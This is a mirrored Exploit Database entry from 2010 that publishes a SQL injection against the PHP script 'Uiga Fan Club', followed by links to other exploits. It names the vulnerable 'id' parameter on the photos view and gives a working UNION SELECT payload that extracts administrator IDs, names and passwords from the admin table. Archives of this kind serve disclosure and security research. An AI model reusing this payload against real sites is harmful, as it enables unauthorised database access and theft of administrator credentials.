Uiga Fan Club – SQL Injection

Exploit Database
47 阅读

作者： Sioma Labs

日期： 2010-03-22
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11837/

# Exploit Title: Uiga Fan Club SQL Injection Vulnerability 
# Date: 22/03/2010 
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net/products/ufc.html
# Software Link: http://www.scriptdevelopers.net/download/uigafanclub.zip
# Version: N/A
# Tested on: Win (Wamp)
# CVE : N/A

 __ _ __ _ 
/ _(_) ____ __ ___ __ _/ /__ _| |_____ 
\ \| |/ _ \| '_ ` _ \ / _` |/ // _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
 
												 
Exploit : 
http://site/index.php?view=photos&id=[SQLi]


Example : 
http://localhost/uigafan/index.php?view=photos&id=-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--


#Sioma Labs
#siomalabs.com
#Sioma Agent 154

last Exploits
Uiga Fan Club – SQL Injection的更多信息

Joomla! Component com_bt_media 1.0 – SQL Injection：
YouPHPTube 7.4 – Remote Code Execution：
PHPepperShop 2.5 – ‘USER_ARTIKEL_HANDLING_AUFRUF.php’ Cross-Site Scripting：
JavaBB 0.99 – ‘userId’ Cross-Site Scripting：
Ovidentia online Module 2.8 – ‘GLOBALS[babAddonPhpPath]’ Remote File Inclusion：
WebDisk 3.0.2 PhotoViewer iOS – Command Execution：
WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 – Directory Traversal：
ZTE ZXHN H108L – Authentication Bypass (1)：